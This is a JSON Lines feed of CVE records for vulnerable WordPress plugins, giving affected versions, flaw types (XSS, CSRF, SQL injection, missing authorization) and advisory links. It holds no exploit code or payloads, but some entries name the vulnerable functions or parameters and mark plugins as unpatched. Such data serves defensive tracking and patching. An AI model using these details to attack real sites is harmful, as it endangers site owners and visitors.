{"CVE_ID":"CVE-2023-4276","slug":"absolute-privacy","versionImpact":"2.1","description":"The Absolute Privacy plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1. This is due to missing nonce validation on the 'abpr_profileShortcode' function. This makes it possible for unauthenticated attackers to change user email and password via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/absolute-privacy\\\/trunk\\\/profile_page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/absolute-privacy\\\/trunk\\\/profile_page.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3855e84-b97e-4729-8a48-55f2a2444e2c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3855e84-b97e-4729-8a48-55f2a2444e2c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0869","slug":"instant-images","versionImpact":"6.1.0","description":"The Instant Images \u2013 One Click Image Uploads from Unsplash, Openverse, Pixabay and Pexels plugin for WordPress is vulnerable to unauthorized arbitrary options update due to an insufficient check that neglects to verify whether the updated option belongs to the plugin on the instant-images\/license REST API endpoint in all versions up to, and including, 6.1.0. This makes it possible for authors and higher to update arbitrary options.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17941fbb-c5da-4f5c-a617-3792eb4ef395?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17941fbb-c5da-4f5c-a617-3792eb4ef395?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instant-images\\\/tags\\\/6.1.0\\\/api\\\/license.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instant-images\\\/tags\\\/6.1.0\\\/api\\\/license.php#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/instant-images\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/instant-images\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3027110\\\/instant-images\\\/tags\\\/6.1.1\\\/api\\\/license.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3027110\\\/instant-images\\\/tags\\\/6.1.1\\\/api\\\/license.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0516","slug":"royal-elementor-addons","versionImpact":"1.3.87","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to unauthorized post metadata update due to a missing capability check on the wpr_update_form_action_meta function in all versions up to, and including, 1.3.87. This makes it possible for unauthenticated attackers to update certain metadata.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3457b87-c860-4cf2-ac3d-2c6521b629ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3457b87-c860-4cf2-ac3d-2c6521b629ea?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2795","slug":"seo-simple-pack","versionImpact":"3.2.1","description":"The SEO SIMPLE PACK plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.2.1 via META description. This makes it possible for unauthenticated attackers to extract limited information about password protected posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f62a9ca0-7077-410f-b005-175348acd133?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f62a9ca0-7077-410f-b005-175348acd133?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-simple-pack\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-simple-pack\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10148","slug":"wp-awesome-buttons","versionImpact":"1.0","description":"The Awesome buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's btn2 shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84ef25b6-8119-41e5-9959-ccdfb9893e75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84ef25b6-8119-41e5-9959-ccdfb9893e75?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-awesome-buttons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-awesome-buttons\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10017","slug":"pjw-mime-config","versionImpact":"1.0","description":"The PJW Mime Config plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2731e8ed-27db-4d2b-b76f-8fdccfb2226a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2731e8ed-27db-4d2b-b76f-8fdccfb2226a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pjw-mime-config\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pjw-mime-config\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54274","slug":"octrace-support","versionImpact":"1.2.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Octrace Studio WordPress HelpDesk & Support Ticket System Plugin \u2013 Octrace Support allows Reflected XSS. This issue affects WordPress HelpDesk & Support Ticket System Plugin \u2013 Octrace Support: from n\/a through 1.2.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/octrace-support\\\/vulnerability\\\/wordpress-octrace-support-plugin-1-2-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/octrace-support\\\/vulnerability\\\/wordpress-octrace-support-plugin-1-2-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11363","slug":"same-but-different","versionImpact":"1.0.16","description":"The Same but Different \u2013 Related Posts by Taxonomy plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.16. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/same-but-different\\\/tags\\\/1.0.15\\\/library\\\/template-parts\\\/tabs.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/same-but-different\\\/tags\\\/1.0.15\\\/library\\\/template-parts\\\/tabs.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d262a3b-6205-45b3-8d8e-da541e07de46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d262a3b-6205-45b3-8d8e-da541e07de46?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12385","slug":"wp-abstracts-manuscripts-manager","versionImpact":"2.7.2","description":"The WP Abstracts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.2. This is due to missing nonce validation on the wpabstracts_load_status() and wpabstracts_delete_abstracts() functions. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-abstracts-manuscripts-manager\\\/trunk\\\/abstracts\\\/abstracts.manage.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-abstracts-manuscripts-manager\\\/trunk\\\/abstracts\\\/abstracts.manage.php#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-abstracts-manuscripts-manager\\\/trunk\\\/abstracts\\\/abstracts.manage.php#L205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-abstracts-manuscripts-manager\\\/trunk\\\/abstracts\\\/abstracts.manage.php#L205\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3223874\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3223874\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-abstracts-manuscripts-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-abstracts-manuscripts-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79af711e-d044-447e-9802-8be648a3843d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79af711e-d044-447e-9802-8be648a3843d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12768","slug":"responsive-iframe","versionImpact":"1.2.0","description":"The Responsive iframe WordPress plugin through 1.2.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe2e47f4-b89e-4c22-8d27-672da0fb99af\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe2e47f4-b89e-4c22-8d27-672da0fb99af\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13468","slug":"trash-duplicate-and-301-redirect","versionImpact":"1.9","description":"The Trash Duplicate and 301 Redirect plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'duplicates-action-top' action in all versions up to, and including, 1.9. This makes it possible for unauthenticated attackers to delete arbitrary posts\/pages.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/trash-duplicate-and-301-redirect\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/trash-duplicate-and-301-redirect\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebb6afd7-6bc4-4c8a-a645-04f64d5adff4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebb6afd7-6bc4-4c8a-a645-04f64d5adff4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6718","slug":"pvn-auth-popup","versionImpact":"1.0.0","description":"The PVN Auth Popup WordPress plugin through 1.0.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d28ea72-8c3b-4607-b877-7b10d954fef9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d28ea72-8c3b-4607-b877-7b10d954fef9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4546","slug":"mapwiz","versionImpact":"1.0.1","description":"The Mapwiz WordPress plugin through 1.0.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/009578b9-016d-49c2-9577-49756c35e1e8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/009578b9-016d-49c2-9577-49756c35e1e8\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/mapwiz_1-0-1\\\/\",\"name\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/mapwiz_1-0-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1931","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the deleteCssAndJsCacheToolbar function in versions up to, and including, 1.1.2. This makes it possible for authenticated attackers with subscriber-level access to perform cache deletion.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4bb2d72-ff31-4220-acb3-ed17bb9229b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4bb2d72-ff31-4220-acb3-ed17bb9229b5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2299","slug":"meeting-scheduler-by-vcita","versionImpact":"4.3.1","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data via the \/wp-json\/vcita-wordpress\/v1\/actions\/auth REST-API endpoint in versions up to, and including, 4.2.10 due to a missing capability check on the processAction function. This makes it possible for unauthenticated attackers to modify the plugin's settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4855627a-de56-49ee-b0b0-01b9735d8557?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4855627a-de56-49ee-b0b0-01b9735d8557?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-api-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-api-functions.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3197","slug":"mstore-api","versionImpact":"4.0.1","description":"The MStore API plugin for WordPress is vulnerable to Unauthenticated Blind SQL Injection via the 'id' parameter in versions up to, and including, 4.0.1 due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30aab1af-a78f-4bac-b3c5-30ea854ccef7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30aab1af-a78f-4bac-b3c5-30ea854ccef7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2929891\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/vendor-wcfm.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2929891\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/vendor-wcfm.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4283","slug":"embedpress","versionImpact":"3.8.2","description":"The EmbedPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'embedpress_calendar' shortcode in versions up to, and including, 3.8.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2950211\\\/embedpress#file18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2950211\\\/embedpress#file18\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b340eda1-e9d2-40b6-89f9-41d995ce3555?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b340eda1-e9d2-40b6-89f9-41d995ce3555?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.8.2\\\/EmbedPress\\\/ThirdParty\\\/Googlecalendar\\\/Embedpress_Google_Helper.php#L522\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.8.2\\\/EmbedPress\\\/ThirdParty\\\/Googlecalendar\\\/Embedpress_Google_Helper.php#L522\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6532","slug":"wp-blogs-planetarium","versionImpact":"1.0","description":"The WP Blogs' Planetarium WordPress plugin through 1.0 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05a730bc-2d72-49e3-a608-e4390b19e97f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05a730bc-2d72-49e3-a608-e4390b19e97f\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6532.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6532.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0515","slug":"royal-elementor-addons","versionImpact":"1.3.87","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the remove_from_compare function. This makes it possible for unauthenticated attackers to remove items from user compare lists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4178271-c09e-4094-a616-5a00d28f39a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4178271-c09e-4094-a616-5a00d28f39a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5730","slug":"pagerank-tools","versionImpact":"1.1.5","description":"The Pagerank tools WordPress plugin through 1.1.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17482b2c-c9ba-480a-8000-879baf835af7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17482b2c-c9ba-480a-8000-879baf835af7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9581","slug":"shortcodes-anywhere","versionImpact":"1.0.1","description":"The Shortcodes AnyWhere plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.0.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e289b06-66c8-4d50-a8f7-e07c5ae8f7c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e289b06-66c8-4d50-a8f7-e07c5ae8f7c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-anywhere\\\/trunk\\\/core\\\/shortcodeEverywhere.class.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-anywhere\\\/trunk\\\/core\\\/shortcodeEverywhere.class.php#L15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10015","slug":"convertcalculator","versionImpact":"1.1.1","description":"The ConvertCalculator for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' and 'type' parameters in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1f55b51-cc93-4f45-9666-03740e147277?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1f55b51-cc93-4f45-9666-03740e147277?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/convertcalculator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/convertcalculator\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11732","slug":"bp-profile-shortcodes-extra","versionImpact":"2.6.0","description":"The BP Profile Shortcodes Extra plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018tab\u2019 parameter in all versions up to, and including, 2.6.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-profile-shortcodes-extra\\\/tags\\\/2.6.0\\\/inc\\\/bppsc-shortcodes-extra.php#L1694\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-profile-shortcodes-extra\\\/tags\\\/2.6.0\\\/inc\\\/bppsc-shortcodes-extra.php#L1694\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bp-profile-shortcodes-extra\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bp-profile-shortcodes-extra\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7324a4e-ff45-4908-bcaa-379b130f73c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7324a4e-ff45-4908-bcaa-379b130f73c0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11338","slug":"pixnet","versionImpact":"2.9.10","description":"The PIXNET Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gtm' and 'venue' parameters in all versions up to, and including, 2.9.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pixnet\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pixnet\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/165bafd4-0cef-4936-af21-6a8ffcfccaef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/165bafd4-0cef-4936-af21-6a8ffcfccaef?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13462","slug":"wp-wiki-tooltip","versionImpact":"2.0.2","description":"The WP Wiki Tooltip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wiki' shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-wiki-tooltip\\\/trunk\\\/class.wp-wiki-tooltip.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-wiki-tooltip\\\/trunk\\\/class.wp-wiki-tooltip.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-wiki-tooltip\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-wiki-tooltip\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/926646de-4fb0-4460-b0d1-4d451e6505ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/926646de-4fb0-4460-b0d1-4d451e6505ca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
